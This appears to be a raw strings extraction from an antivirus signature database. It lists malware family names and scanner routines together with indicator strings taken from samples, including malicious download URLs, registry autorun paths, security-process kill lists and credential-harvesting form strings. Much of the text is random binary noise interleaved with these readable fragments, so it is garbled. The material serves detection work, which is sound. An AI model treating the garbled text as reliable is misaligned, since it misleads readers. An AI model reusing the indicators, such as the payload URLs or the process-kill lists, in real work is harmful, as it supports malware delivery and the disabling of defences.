!#RHASH:MSIL/Tnega.RT!MTBl= !#PUA:ML:Blocked:AdLegendl= 6)4XR !#PUA:ML:Blocked:ProxyWebl= 3Y \\mLO !#PUA:ML:Blocked:DelTriall= !#PUA:ML:Blocked:WDJiangel= !#PUA:ML:Blocked:MagicBoxl= `W,:B !#PUA:ML:Blocked:WebGuardl= !#PUA:IRSH:Block:MediaGetl= _FO 3 !#PUA:ML:Blocked:BadFlashl= >U1:] !#PUA:ML:Blocked:NewRadiol= D V(? !#PUA:ML:Blocked:FileTourl= !#ALFPER:ML:Staged:Silconl= !#PUA:ML:Blocked:WYClientl= !#PUA:ML: _Server HWND :%ld \tHWND :%ld http://www.myfiledistribution.com/mfd.php )http://www.myfiledistribution.com/mfd.php IELite ver:0.0.0 !Pushbot.M !Slenfbot.Y !Slenfbot.AB !Vundo.CK !Vundo.CL !Agent.MM !Small.gen!AO !Agent.EC !Slenfbot.PK !Slenfbot.PL !Slenfbot.PM !Slenfbot.PN !Slenfbot.PO !Slenfbot.PP !Vundo.GA fT^PhX !Vundo.GB [PWSR[ $ [PWSR[ !Agent.FM !Small.AAAV Killav.U echowscript.sleep rechowscript.sleep set/ai= :timeou tif%i%==0gotonextsetlocalset/ai=%i%-1cscript//nologo 0gototimeout !Cinmus.E DoSSSetup.DLL DoSSSetup.DLLDoSSSetup FirstInstall verion dddd, MMMM dd, yyyy <program name unknown> CreateMutexA] !Cinmus.D C:\\WINDOWS\\SYSTEM32\\rxjh 0!C:\\WINDOWS\\SYSTEM32\\rxjh [C:\\WINDOWS\\SYSTEM32\\rxjh !Slenfbot.PQ !Slenfbot.PR $p+D3\" !Slenfbot.PS !Slenfbot.PT !Slenfbot.PU !Busky.D out.dll InitProc Sv6MVaV19D /download .php?affid= 0-9&subacc= !Busky.A BCuser32.dll BCkernel32.dll ComSpec GetEnvironmentVariableA !Busky.B !Busky.EC !Killav.KH !Ldpinch.ZE C:\\TEMP\\pinch !Vundo.CM !Vundo.CN !Vundo.CO !Vundo.CP !Neeris.J !Slenfbot.PV U<TNY !Slenfbot.PW !Slenfbot.PX !Slenfbot.PY !Slenfbot.PZ !Slenfbot.QA !Slenfbot.QB !Slenfbot.QC !Pushbot.CV !Neeris.gen!B !Neeris.gen!C h0uWj !Small.AAAX Sv_Sn !Vundo.CQ!dll $16B435F6-B6CE-4F24-A568-944B27ED919Cd d$16B435F6-B6CE-4F24-A568-944B27ED919Cd targettedbanner.biz &tail= &exceed= &version= &clicked= showed= IsRotatorPopup clicklimit refresh_time glob_click_limit max_impress PopupMgr 0Internet Explorer_Server opera] !Killav.FB!bat !Agent.ZDD $system32\\tcsvc.sys 8http://www.jajaan.com/ip.asp gg/gg.asp] !Agent.ZDE /br.youtube.com/watch?v=Tw5TejrSIEA 62FC62EF0B66878083E80F2F339CC37297311A4E8CB0 ,62FC62EF0B66878083E80F2F339CC37297311A4E8CB0 !Agent.ZDF play.dll ser.exe miniup.exe !Agent.ZDG http://arpp0934.iespana.es\\ !Agent.ZDH LuoXue beep.sys sbl.sys !Agent.ZDI wyf[1].css !Agent.ZDJ Fhttp://www.KJDhendieldiouyu.COM/CFDATA.ima?ccode=%s&cfdatacc=%s&gmt=%d asdfjkluiop.com sweepstakess.com hotxxxtv.com freeporntoday.net freepornnow.net \tporn1.org virgins virgins] !Agent.ZDK www.c0rrupted.com B C:\\WINDOWS\\system32\\imglog.exe C:\\WINDOWS\\system32\\imglog.exex Nhttp://vidareal2010.pisem.su/imglog.exe - !Agent.ZDL Ph http://bot.cjfeeds.com http://bot.cjfeeds.com] !Agent.ZDM WARE\\Microsoft\\Windows\\CurrentVersion\\Run c:\\log.htm C:\\pstorage.exe PStorage C:\\userquota.exe UserQuota -LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32 w32_sharedpt WARE\\Microsoft\\Windows\\CurrentVersion\\Runsenderc:\\log.htmC:\\pstorage.exePStorageC:\\userquota.exeUserQuota-LIBGCCW32-EH-2-SJLJ-GTHR-MINGW32w32_sharedpt Referer: http:// @upload.php !Pushbot.CW !Slenfbot.QD !Slenfbot.QE !Slenfbot.QF !Slenfbot.QG !Slenfbot.QH !Slenfbot.QI !Slenfbot.QJ !Slenfbot.QK !Slenfbot.QL !Slenfbot.QM !Slenfbot.QN !Slenfbot.QO !Slenfbot.QP !Slenfbot.QQ !Slenfbot.QR !Slenfbot.QS !Waledac.A !Lusval.A !AdultChat.B %s://%s:%s@%s:%d%s%s \\%s\\dialers\\%s\\%s.exe {B5DD9A64-5C4B-4a48-BE56-97C1A8F85708} &{B5DD9A64-5C4B-4a48-BE56-97C1A8F85708} www.kjdhendieldiouyu.com fastvideoplayerliteCtrl Class /usednsupdate /password: /username:%s /username:%s] !Agent.BDC MonitoringTool:Win32/SystemSurveillance 'MonitoringTool:Win32/SystemSurveillance downloads\\sspro\\internet\\ ;downloads\\sspro\\internet\\ sspro @systemsurveillancepro ssprodataviewer)][additem(%win%\\sspro.exe,ssprodataviewer,%win%\\sspro.exe pssprodataviewer)][additem(%win%\\sspro.exe,ssprodataviewer,%win%\\sspro.exe Usspro.exe/uninstall,uninstallsspro System Surveillance Pro System Surveillance Pro\tJf19132 %SYS% \t\tf160 %WIN% downloads\\sspro\\internet\\gp System Surveillance 3AddItem(%WIN%\\ssp32hp.chm,Help Manual,%WIN%\\ssp32hp DeleteGroup(System Surveillance &%DESKTOPDIR%\\SystemSurveillancePro.htm 4emailsnapshotinterval=%INI_SS_EMAILSNAPSHOTINTERVAL% 2clearlogsafteremail=%INI_LOGS_CLEARLOGSAFTEREMAIL% $then restart the System Surveillance $then restart the System Surveillanceg !Hamweq.CM $08B0E5C0-4FCB-11CF-AAX5-90401C608512 tassweq.com ise.exe !Agent.ZEA trojdie.kxp,assistse.exe,rfw.exe,kavpfw.exe,kpfwsvc.exe,kavstart.exe,kwatch.exe,kavplus.exe mir.exe,mir.dat Content-Type: application/x-www-form-urlencoded GetModuleFileNameExAtrojdie.kxp,assistse.exe,rfw.exe,kavpfw.exe,kpfwsvc.exe,kavstart.exe,kwatch.exe,kavplus.exemir.exe,mir.dat \"Content-Type: application/x-www-form-urlencoded ForthgoerHTTP/1.0 200 %s=%s=%s/%s=%s=%s/%s=%s 200 %s=%s=%s/%s=%s=%s/%s=%sh wav\\Log-in-long2.wav wvwww.gamenete.com look/login.asp /look/pip.asp wvwww.gamenete.comlook/login.asp/look/pip.asp 750 online! 750 offline! 850 offline! 950 1.50 991 1 991 0 900 User: Pass: 100300320750 online!750 offline!801802803804850850 offline!950 1.50974990991 1991 0::900 User: Pass:400 ./ SOFTWARE\\wSkysoft %SOFTWARE\\wSkysoft~xQPOSThttp://] !QQHelper.AA !Winspy.Y \\C:\\ZKing8\\WinZ\\WSP\\RenoNevada\\FTPREM\\MyFTP.vbp ,SOFTWARE\\AutoNewUpdate &SOFTWARE\\ccAppRemXP /Win-Spy.com/www/1 SOFTWARE\\RASOA OutlookSMTP.exe outlookrem.exe msimnSMTP.exe] !Slenfbot.QT !Slenfbot.QU !Slenfbot.QV VnaG68x !Slenfbot.QW !Slenfbot.QX !Slenfbot.QY !Slenfbot.QZ !Slenfbot.RA !Bagle.RW !Bagle.RX !Vundo.R !Slenfbot.RB !Slenfbot.RC !Slenfbot.RD !Slenfbot.RE !Small.JF %s\\updatax.exe HDDGuard.dll KvTrust.dll UrlGuard.dll antispy.dll safemon.dll ieprot.dll !Renos.EU !Slenfbot.RF !Slenfbot.RG !Slenfbot.RH !Slenfbot.RI !Slenfbot.RJ !Bagle.RY -6=RX7 !Bagle.RZ -6=Rs[ !Slenfbot.RK !Slenfbot.RL !Slenfbot.RM !Slenfbot.RN !Agent.BP GetOpenFileNameA http://kokovs.cc/porno/stat.php ?nick= &info=iBank2 Software\\JavaSoft\\Prefs logo.png logo.png] !Vundo.CR !Bagle.SA !Agent.BQ !Slenfbot.RO !Slenfbot.RP !Slenfbot.RQ !Slenfbot.RR !Slenfbot.RS !Slenfbot.RT !Slenfbot.RU !Slenfbot.RV !Slenfbot.RW !Slenfbot.RX !Pushbot.CX !Pushbot.CY !Pushbot.CZ !Harnig.gen!M http://toolbar http://traff /progs_traff/ !Small.BPO !Agent.AIE !Agent.AIF !Agent.AIG !Agent.AIJ !Agent.AIK !Agent.AIM !Agent.AIN !Agent.AIO !Agent.AIP Uqb = <t\"?\" ? irh# jj}D= ? z}k #=2>\" %#=2>\" )? :G S\t?&;?\"u 4 \t?$ <4 \t?$ +? BCF >&ST F ]{> ^_ jl?S? n~/\t? l?S?\" 5l?S?\" 56?&RV > !-3e Xu,> Xu,> $+ >\t8Ik#e? M? ;A RbW$? >\tcd[ ->#jk >O3x> =!7:J .`1>% B.`1>%CY / GW;*M? >%iu* G|9= wG|9= x > 534 ?%<?C ?\tIVk#e? BO3x> =!/58 p9?#LR CX?!_ B>\tosQ BN+?! l?S? ? #7xc ~?$%4 l?&CS= +?%Ui .`1> .`1> j 3^\t?% 3^\t?%q{\\_ ? -[} 4=<,?? JO!T9? ?\"PQ< =%de$NV= }>&n{ to8&? scan_polip Win32/Polip.A scan_polipWin32/Polip.A4 scan_polip_catchall scan_polip_catchallWin32/Polip.A2 scan_polip_helper scan_polip_helperWin32/Polip.A scan_opclog scan_opclog2 scan_puce Worm:Win32/Puce.gen!A scan_puceWorm:Win32/Puce.gen!A5 scan_qqhelp Program:Win32/QQHelper scan_qqhelpProgram:Win32/QQHelper1 scan_QQpass Win32/QQpass.gen!D scan_QQpassWin32/QQpass.gen!D3 scan_quickbatch scan_quickbatchQuickBatch_Write: scan_ramnit Virus:Win32/Ramnit!remnants scan_ramnitVirus:Win32/Ramnit!remnants= Scan_ramnit_obfuscator_a Scan_ramnit_obfuscator_aRPF:Ramnitobfus.A@ scan_regcureversiontest Program:Win32/RegCure scan_regcureversiontestProgram:Win32/RegCure6 scan_renos Joke:Win32/Renos.gen!dll scan_renosJoke:Win32/Renos.gen!dllI scan_renos_dropper TrojanDownloader:Win32/Renos.gen!dr scan_renos_dropperTrojanDownloader:Win32/Renos.gen!drJ scan_renos_dropper2 scan_renos_dropper2TrojanDownloader:Win32/Renos.gen!drH scan_renos_gen_as TrojanDownloader:Win32/Renos.gen!AS scan_renos_gen_asTrojanDownloader:Win32/Renos.gen!ASH scan_renos_gen_at TrojanDownloader:Win32/Renos.gen!AT scan_renos_gen_atTrojanDownloader:Win32/Renos.gen!ATH scan_renos_gen_au TrojanDownloader:Win32/Renos.gen!AU scan_renos_gen_auTrojanDownloader:Win32/Renos.gen!AUH scan_renos_gen_av TrojanDownloader:Win32/Renos.gen!AV scan_renos_gen_avTrojanDownloader:Win32/Renos.gen!AVH scan_renos_gen_aw TrojanDownloader:Win32/Renos.gen!AW scan_renos_gen_awTrojanDownloader:Win32/Renos.gen!AWH scan_renos_gen_ax TrojanDownloader:Win32/Renos.gen!AX scan_renos_gen_axTrojanDownloader:Win32/Renos.gen!AX@ scan_renos_as TrojanDownloader:Win32/Renos.AS scan_renos_asTrojanDownloader:Win32/Renos.ASA scan_renos_as2 scan_renos_as2TrojanDownloader:Win32/Renos.AS5 scan_rescan rescan_from_attributes scan_rescanrescan_from_attributes7 scan_prescan prescan_from_attributes scan_prescanprescan_from_attributes9 scan_rescan64 rescan_from_attributes64 scan_rescan64rescan_from_attributes64; scan_rescanARM rescan_from_attributesARM scan_rescanARMrescan_from_attributesARM7 scan_rlsloup_a Virus:Win32/Rlsloup.A scan_rlsloup_aVirus:Win32/Rlsloup.A= scan_rogue Program:Win32/InternetAntivirus scan_rogueProgram:Win32/InternetAntivirusA scan_rootkitdrv VirTool:WinNT/Rootkitdrv.gen!A scan_rootkitdrvVirTool:WinNT/Rootkitdrv.gen!A4 Scan_RovnixDropper Scan_RovnixDropperRovnix_Dropper rsfx6 scan_rukap Backdoor:Win32/Rukap.gen scan_rukapBackdoor:Win32/Rukap.gen1 scan_rustock Win32/Rustock.gen scan_rustockWin32/Rustock.gen5 scan_rustock_e Win32/Rustock.E!gen scan_rustock_eWin32/Rustock.E!genC scan_rustock_exhaustive Win32/Rustock.exhaustive scan_rustock_exhaustiveWin32/Rustock.exhaustive5 scan_rustock_f WinNT/Rustock.F!gen scan_rustock_fWinNT/Rustock.F!gen< scan_rustock_an Backdoor:WinNT/Rustock.AN scan_rustock_anBackdoor:WinNT/Rustock.AN9 sality_am_helper Virus:Win32/Sality.AM sality_am_helperVirus:Win32/Sality.AM2 sality_am sality_amVirus:Win32/Sality.AM6 sality_h sality_hVirus:Win32/Sality.gen!enc2 sality_an Virus:Win32/Sality.AN sality_anVirus:Win32/Sality.AN8 attrmatch_sality_au attrmatch_sality_auPEBMPAT:Sality_AU8 dll_dropper_scan_Scano Win32/Scano.dr dll_dropper_scan_ScanoWin32/Scano.dr0 scan_Scano Win32/Scano.gen@mm scan_ScanoWin32/Scano.gen@mm2 scan_Scano_dumb Win32/Scano.dam scan_Scano_dumbWin32/Scano.dam< scan_sdbot_based Backdoor:Win32/Sdbot.gen scan_sdbot_basedBackdoor:Win32/Sdbot.gen; scan_themidabot scan_themidabotBackdoor:Win32/Sdbot.gen4 scan_sefnit Trojan:Win32/Sefnit.C scan_sefnitTrojan:Win32/Sefnit.CA scan_sefnit_exhaustive Win32/Sefnit.exhaustive scan_sefnit_exhaustiveWin32/Sefnit.exhaustive, clean_Selges !PefileClean clean_Selges!PefileClean> Scan_sfxcabinet sfxcabinet_script_extractor Scan_sfxcabinetsfxcabinet_script_extractorA scan_shopathomeabdiff Spyware:Win32/ShopAtHome scan_shopathomeabdiffSpyware:Win32/ShopAtHome+ scan_silcer Win32/Silcer scan_silcerWin32/Silcer+ scan_simile Win32/Simile scan_simileWin32/Simile2 scan_simile_object scan_simile_objectWin32/Simile0 scan_simile_post scan_simile_postWin32/Simile7 scan_sinowal PWS:Win32/Sinowal.gen!D scan_sinowalPWS:Win32/Sinowal.gen!D@ scan_sinowal_exhaustive PWS:Win32/Sinowal.gen scan_sinowal_exhaustivePWS:Win32/Sinowal.gen= scan_sinowal_gen_y PWS:Win32/Sinowal.gen!Y scan_sinowal_gen_yPWS:Win32/Sinowal.gen!Y+ scan_sintun Win32/Sintun scan_sintunWin32/SintunC scan_sirefef_exhaustive Win32/Sirefef.exhaustive scan_sirefef_exhaustiveWin32/Sirefef.exhaustive$ scan_sk !SkHelper scan_sk!SkHelper4 scan_slagent Adware:Win32/Slagent scan_slagentAdware:Win32/Slagent3 Scan_Slugin Virus:Win32/Slugin.A Scan_SluginVirus:Win32/Slugin.A4 scan_downloader Win32/Downloaders scan_downloaderWin32/Downloaders9 scan_batdetour_a Virus:Win32/Batdetour scan_batdetour_aVirus:Win32/Batdetour6 scan_mariofev scan_mariofevVirus:Win32/Batdetour4 scan_custom_kcrc Win32/CustomKCRC scan_custom_kcrcWin32/CustomKCRC1 SmartAssemblyResourceUnpacker SmartAssemblyResourceUnpacker> scan_spamthru Trojan:Win32/SpamThru.gen!dll scan_spamthruTrojan:Win32/SpamThru.gen!dll+ scan_spyaxe Win32/Spyaxe scan_spyaxeWin32/Spyaxe@ srizbi_detect_driver Spammer:WinNT/Srizbi.gen srizbi_detect_driverSpammer:WinNT/Srizbi.genD srizbi_dropper_d TrojanDropper:Win32/Srizbi.gen!D srizbi_dropper_dTrojanDropper:Win32/Srizbi.gen!D6 scan_stration Win32/Stration.gen!dr scan_strationWin32/Stration.gen!dr7 scan_stration2 scan_stration2Win32/Stration.gen!drB scan_stration_dropper_b Win32/Stration.gen!dr.B scan_stration_dropper_bWin32/Stration.gen!dr.BA scan_stration_downloader Win32/Stration.gen!dl scan_stration_downloaderWin32/Stration.gen!dlE scan_stration_downloader_b Win32/Stration.gen!dl.B scan_stration_downloader_bWin32/Stration.gen!dl.BE scan_stration_downloader_c Win32/Stration.gen!dl.C scan_stration_downloader_cWin32/Stration.gen!dl.CE scan_stration_downloader_d Win32/Stration.gen!dl.D scan_stration_downloader_dWin32/Stration.gen!dl.DE scan_stration_downloader_e Win32/Stration.gen!dl.E scan_stration_downloader_eWin32/Stration.gen!dl.EE scan_stration_downloader_f Win32/Stration.gen!dl.F scan_stration_downloader_fWin32/Stration.gen!dl.FE scan_stration_downloader_g Win32/Stration.gen!dl.G scan_stration_downloader_gWin32/Stration.gen!dl.G? scan_stration_dll_a Win32/Stration.gen!dll.A scan_stration_dll_aWin32/Stration.gen!dll.A? scan_stration_dll_b Win32/Stration.gen!dll.B scan_stration_dll_bWin32/Stration.gen!dll.B? scan_stration_dll_c Win32/Stration.gen!dll.C scan_stration_dll_cWin32/Stration.gen!dll.C? scan_stration_dll_d Win32/Stration.gen!dll.D scan_stration_dll_dWin32/Stration.gen!dll.D? scan_stration_dll_e Win32/Stration.gen!dll.E scan_stration_dll_eWin32/Stration.gen!dll.E? scan_stration_dll_f Win32/Stration.gen!dll.F scan_stration_dll_fWin32/Stration.gen!dll.FB scan_stration_dropper_c Win32/Stration.gen!dr.C scan_stration_dropper_cWin32/Stration.gen!dr.CB scan_stration_dropper_d Win32/Stration.gen!dr.D scan_stration_dropper_dWin32/Stration.gen!dr.DE scan_stration_downloader_h Win32/Stration.gen!dl.H scan_stration_downloader_hWin32/Stration.gen!dl.HE scan_stration_downloader_i Win32/Stration.gen!dl.I scan_stration_downloader_iWin32/Stration.gen!dl.I: scan_stration_k Trojan:Win32/Stration.K scan_stration_kTrojan:Win32/Stration.KE scan_stration_downloader_j Win32/Stration.gen!dl.J scan_stration_downloader_jWin32/Stration.gen!dl.JB scan_stration_dropper_e Win32/Stration.gen!dr.E scan_stration_dropper_eWin32/Stration.gen!dr.EB scan_stration_dropper_f Win32/Stration.gen!dr.F scan_stration_dropper_fWin32/Stration.gen!dr.F- scan_stresid Win32/Stresid scan_stresidWin32/Stresid5 scan_stutter Virus:Win32/Stutter.A scan_stutterVirus:Win32/Stutter.A2 scan_taggant scan_taggantRPF:FileHasTaggantC scan_tesch_obfuscator PEBMPAT:Tesch_Obfuscator.A scan_tesch_obfuscatorPEBMPAT:Tesch_Obfuscator.A8 scan_virus_theals Win32/Theals.gen@mm scan_virus_thealsWin32/Theals.gen@mm- scan_themida Themida_Entry scan_themidaThemida_Entry, scan_thinstall Thinstall_ scan_thinstallThinstall_' scan_tibs Win32/Tibs scan_tibsWin32/Tibs( scan_tibs2 scan_tibs2Win32/Tibs( scan_tibs3 scan_tibs3Win32/Tibs( scan_tibs4 scan_tibs4Win32/Tibs( scan_tibs5 scan_tibs5Win32/Tibs( scan_tibs6 scan_tibs6Win32/Tibs( scan_tibs7 scan_tibs7Win32/TibsB scan_cbeplay_f TrojanDownloader:Win32/Cbeplay.F scan_cbeplay_fTrojanDownloader:Win32/Cbeplay.FB scan_cbeplay_i TrojanDownloader:Win32/Cbeplay.I scan_cbeplay_iTrojanDownloader:Win32/Cbeplay.I; scan_festeal_d TrojanSpy:Win32/Festeal.D scan_festeal_dTrojanSpy:Win32/Festeal.DB scan_chepvil_h TrojanDownloader:Win32/Chepvil.H scan_chepvil_hTrojanDownloader:Win32/Chepvil.H9 scan_cutwail_a Spammer:Win32/Cutwail.A scan_cutwail_aSpammer:Win32/Cutwail.A; codepatch_tibs FOP:Win32/Tibs_obfuscator codepatch_tibsFOP:Win32/Tibs_obfuscatorI scan_dldr_ursnif_a TrojanDownloader:Win32/Ursnif.gen!A scan_dldr_ursnif_aTrojanDownloader:Win32/Ursnif.gen!AI scan_dldr_ursnif_b TrojanDownloader:Win32/Ursnif.gen!B scan_dldr_ursnif_bTrojanDownloader:Win32/Ursnif.gen!BB scan_rk_ursnif_a TrojanSpy:Win32/Ursnif.gen!sys scan_rk_ursnif_aTrojanSpy:Win32/Ursnif.gen!sysA scan_spy_ursnif_a TrojanSpy:Win32/Ursnif.gen!A scan_spy_ursnif_aTrojanSpy:Win32/Ursnif.gen!AA scan_spy_ursnif_b TrojanSpy:Win32/Ursnif.gen!B scan_spy_ursnif_bTrojanSpy:Win32/Ursnif.gen!BA scan_spy_ursnif_c TrojanSpy:Win32/Ursnif.gen!C scan_spy_ursnif_cTrojanSpy:Win32/Ursnif.gen!C= scan_virtool_ursnif_a Virus:Win32/Ursnif.A scan_virtool_ursnif_aVirus:Win32/Ursnif.A= scan_virtool_ursnif_b Virus:Win32/Ursnif.B scan_virtool_ursnif_bVirus:Win32/Ursnif.B1 scan_vampiro [Vampiro_EPODump] scan_vampiro[Vampiro_EPODump]/ scan_viking Win32/Viking.gen scan_vikingWin32/Viking.gen3 scan_emerleox Win32/Emerleox.gen scan_emerleoxWin32/Emerleox.gen= scan_viknok_rpcss Virus:Win32/Viknok!rpcss scan_viknok_rpcssVirus:Win32/Viknok!rpcss5 scan_viknok_a Virus:Win64/Viknok.A scan_viknok_aVirus:Win64/Viknok.AK scan_viknok64_a_preemul Virus:Win64/Viknok.A!pefile_scan scan_viknok64_a_preemulVirus:Win64/Viknok.A!pefile_scanH breakpoint_viknok64_a Virus:Win64/Viknok.A!breakpoint breakpoint_viknok64_aVirus:Win64/Viknok.A!breakpoint: Scan_VirutInOrder Virus:Win32/Virut.PRE Scan_VirutInOrderVirus:Win32/Virut.PRET scan_virut Virus:Win32/Virut.{D,L,K,AE,AG,AH,I,AM,AR,AJ,AK,AL,AN} scan_virutVirus:Win32/Virut.{D,L,K,AE,AG,AH,I,AM,AR,AJ,AK,AL,AN}= scan_virut_overlay Virus:Win32/Virut.gen!J scan_virut_overlayVirus:Win32/Virut.gen!JB scan_virutd Virus:Win32/Virut.{D,E,F,G,H,I,J,K} scan_virutdVirus:Win32/Virut.{D,E,F,G,H,I,J,K}; scan_virut_damaged Virus:Win32/Virut.dam scan_virut_damagedVirus:Win32/Virut.dam7 scan_virut_gen Virus:Win32/Virut.gen scan_virut_genVirus:Win32/Virut.gen1 attrmatch_virut_bn virut_type_ attrmatch_virut_bnvirut_type_: breakpoint_virut_bn breakpoint_virut_bnbreakpoint_virut_bn. scan_virut_bn scan_virut_bnscan_virut_bn1 scan_vmprotect_entry VMProtect scan_vmprotect_entryVMProtect+ scan_vmprotect scan_vmprotectVMProtect< scan_virtumonde Trojan:Win32/Virtumonde.F scan_virtumondeTrojan:Win32/Virtumonde.F= scan_virtumonde2 scan_virtumonde2Trojan:Win32/Virtumonde.F< scan_virtumonde3 Trojan:Win32/Vundo.gen!A scan_virtumonde3Trojan:Win32/Vundo.gen!A> scan_virtumonde_o Adware:Win32/Virtumonde.O scan_virtumonde_oAdware:Win32/Virtumonde.O@ scan_virtumonde_dr Trojan:Win32/Virtumonde.dr scan_virtumonde_drTrojan:Win32/Virtumonde.dr< scan_virtumonde4 Trojan:Win32/Vundo.gen!B scan_virtumonde4Trojan:Win32/Vundo.gen!B< scan_vundo_gen_f Trojan:Win32/Vundo.gen!F scan_vundo_gen_fTrojan:Win32/Vundo.gen!F4 scan_vundo_q Trojan:Win32/Vundo.Q scan_vundo_qTrojan:Win32/Vundo.Q6 scan_vundo_et Trojan:Win32/Vundo.ET scan_vundo_etTrojan:Win32/Vundo.ET9 scan_vundo_ih Trojan:Win32/Vundo.gen!X scan_vundo_ihTrojan:Win32/Vundo.gen!X6 scan_vundo_iu Trojan:Win32/Vundo.IU scan_vundo_iuTrojan:Win32/Vundo.IU> scan_vundo_gen_aa Trojan:Win32/Vundo.gen!AA scan_vundo_gen_aaTrojan:Win32/Vundo.gen!AA= scan_vundo_genad Trojan:Win32/Vundo.gen!AD scan_vundo_genadTrojan:Win32/Vundo.gen!AD> scan_vundo_gen_ba Trojan:Win32/Vundo.gen!BA scan_vundo_gen_baTrojan:Win32/Vundo.gen!BA= scan_vundo_genaf Trojan:Win32/Vundo.gen!AF scan_vundo_genafTrojan:Win32/Vundo.gen!AF> scan_vundo_gen_bb Trojan:Win32/Vundo.gen!AG scan_vundo_gen_bbTrojan:Win32/Vundo.gen!AG? scan_vundo_gen_expdll Trojan:Win32/Vundo.dll scan_vundo_gen_expdllTrojan:Win32/Vundo.dll) scan_vxidl Win32/Vxidl scan_vxidlWin32/Vxidl* scan_vxidl2 scan_vxidl2Win32/Vxidl? scan_webhancerabdiff Spyware:Win32/WebHancer scan_webhancerabdiffSpyware:Win32/WebHancer+ map_winfix_res !Winfixer map_winfix_res!Winfixer( scan_winfix scan_winfix!Winfixer- scan_winshow Win32/WinShow scan_winshowWin32/WinShow4 scan_wintrim Trojan:Win32/Wintrim scan_wintrimTrojan:Win32/Wintrim7 scan_wintrim2 Trojan:Win32/Wintrim.B scan_wintrim2Trojan:Win32/Wintrim.B5 scan_wintrim3 scan_wintrim3Trojan:Win32/Wintrim: scan_skintrim_b Trojan:Win32/Skintrim.B scan_skintrim_bTrojan:Win32/Skintrim.B: scan_skintrim_c Trojan:Win32/Skintrim.C scan_skintrim_cTrojan:Win32/Skintrim.C: scan_skintrim_k Trojan:Win32/Skintrim.K scan_skintrim_kTrojan:Win32/Skintrim.K: scan_skintrim_l Trojan:Win32/Skintrim.L scan_skintrim_lTrojan:Win32/Skintrim.L: scan_skintrim_m Trojan:Win32/Skintrim.M scan_skintrim_mTrojan:Win32/Skintrim.M) rescan_wintrim !Rescan rescan_wintrim!Rescan* rescan_wintrim2 rescan_wintrim2!Rescan8 winwebsec_dump FOPEX:Winwebsec_packer winwebsec_dumpFOPEX:Winwebsec_packer7 scan_worm_agent_a Worm:Win32/Agent.A scan_worm_agent_aWorm:Win32/Agent.A3 scan_wratch Virus:Win32/Wratch.A scan_wratchVirus:Win32/Wratch.A1 scan_xorer Virus:Win32/Xorer.Z scan_xorerVirus:Win32/Xorer.Z) scan_xpaj Win32/Xpaj.A scan_xpajWin32/Xpaj.A+ scan_xpaj_j Win32/Xpaj.J scan_xpaj_jWin32/Xpaj.JB scan_xpantivirobfus VirTool:Win32/Obfuscator.DH scan_xpantivirobfusVirTool:Win32/Obfuscator.DH7 scan_zbot_gen_m PWS:Win32/Zbot.gen!M scan_zbot_gen_mPWS:Win32/Zbot.gen!M1 scan_zbot_ga PWS:Win32/Zbot.GA scan_zbot_gaPWS:Win32/Zbot.GA3 scan_zbotav PWS:Win32/Zbot.gen!G scan_zbotavPWS:Win32/Zbot.gen!GF zbot_obfuscator_codepatch zbot_obfuscator_codepatchzbot_obfuscator_codepatchH zbot_obfuscator_bp_handler Zbot_Obfuscator_Breakpoint zbot_obfuscator_bp_handlerZbot_Obfuscator_BreakpointA zbot_obfuscator_decrypt FOPEX:Zbot_Decryption_ zbot_obfuscator_decryptFOPEX:Zbot_Decryption_E scan_zbot_sysclean PWS:Win32/Zbot_Threadscan_Clean scan_zbot_syscleanPWS:Win32/Zbot_Threadscan_CleanK scan_zbot_2x_sysclean PWS:Win32/Zbot_2x_Threadscan_Clean scan_zbot_2x_syscleanPWS:Win32/Zbot_2x_Threadscan_Clean< scan_zlob TrojanDownloader:Win32/Zlob.gen scan_zlobTrojanDownloader:Win32/Zlob.gen@ scan_zlob2 TrojanDownloader:Win32/Zlob.gen!CU scan_zlob2TrojanDownloader:Win32/Zlob.gen!CU@ scan_zlob3 TrojanDownloader:Win32/Zlob.gen!DB scan_zlob3TrojanDownloader:Win32/Zlob.gen!DB= scan_zlob4 TrojanDownloader:Win32/Zlob.APO scan_zlob4TrojanDownloader:Win32/Zlob.APOA scan_zlobcrypt Trojan:Win32/Zlob.gen!encrypted scan_zlobcryptTrojan:Win32/Zlob.gen!encrypted@ scan_zlob_l TrojanDownloader:Win32/Zlob.gen!L scan_zlob_lTrojanDownloader:Win32/Zlob.gen!L- scan_zmorph Win95/Zmorph.B scan_zmorphWin95/Zmorph.B- scan_fusion_dll fusion_dll scan_fusion_dllfusion_dll7 scan_prifou_manifest prifou_manifest scan_prifou_manifestprifou_manifest- scan_GenPe GenPeClassifier scan_GenPeGenPeClassifier5 ! ;R)+XccH Ai ]g vgdpY jlvss3 vjsTi@ /T#hk' ?UL\" u}1@U i[u_(n _}9sv\t o7 qgF # OO=\tk 0izU1 y{0`` -Dlk! F3j_~ }6:[MgWs VY[ag \"QL[@ +<@Aq :[VK'J srq\"i6 z-]o wu\"~b S(Nd3 U!B'h< ?rOVr HXx-n 3-,@@cF m-6d[ ,i@OP) 8DM,- a[rqe j#P$\" ARBJzp hG%W+ buE2Z Sq7O;0 6A0;8 @2 6U +.Qabn [+9I] I?\"#% C@ ?! '*C@ ?!()/ <l?S? .`1>! Vc.`1>!WX C@ ?! T? (+^ l?S? l?S? < > =>\t ?&AX= >$BVm_ =\"CHD 1`i> M1`i> m&?%07, = AGjL FP6o> 5=#O_ l?S? >%Z[xN fgbzI< jrh{q> NZ ? ,Z&= 37.`1> 5fY ? >$AMw C@ ?! BHC@ ?!CG F_?F> ik1`i> ry.>\" Y? >\t:KQ A>%>Hc >\"DFh .vD>\t Nf^,9? aXN?\t aXN?\tPd? Jb?%W \\_~!> F12?# $>%(*. I<)?# )I<)?# >&7gw ;> DE ?\"]bh ? ht* ?!ilz > ms} 3^\t? z{3^\t? ?%$\\^ <>&12 U.`1> s?&`h 3O3x> *r_> > ',oL 2{>&4rPg ? ?#z{ l?S? %_.&= Ef=\"-/< A>\"9: >&=P_@ BE\"^?!C >\tYdk#e? 2# ?\" i2# ?\"j ppdata\\local\\seclore\\filesecure\\filesecure lite\\pptlauncher.exe %userprofile%\\appdata\\local\\seclore\\filesecure\\filesecure lite\\xlslauncher.exe O%userprofile%\\appdata\\local\\seclore\\filesecure\\filesecure lite\\xlslauncher.exe %userprofile%\\appdata\\local\\sogouexplorer\\sogouexplorer.exe <%userprofile%\\appdata\\local\\sogouexplorer\\sogouexplorer.exe %userprofile%\\appdata\\local\\vivaldi\\application\\vivaldi.exe <%userprofile%\\appdata\\local\\vivaldi\\application\\vivaldi.exe %userprofile%\\appdata\\local\\vivaldidev\\application\\vivaldi.exe 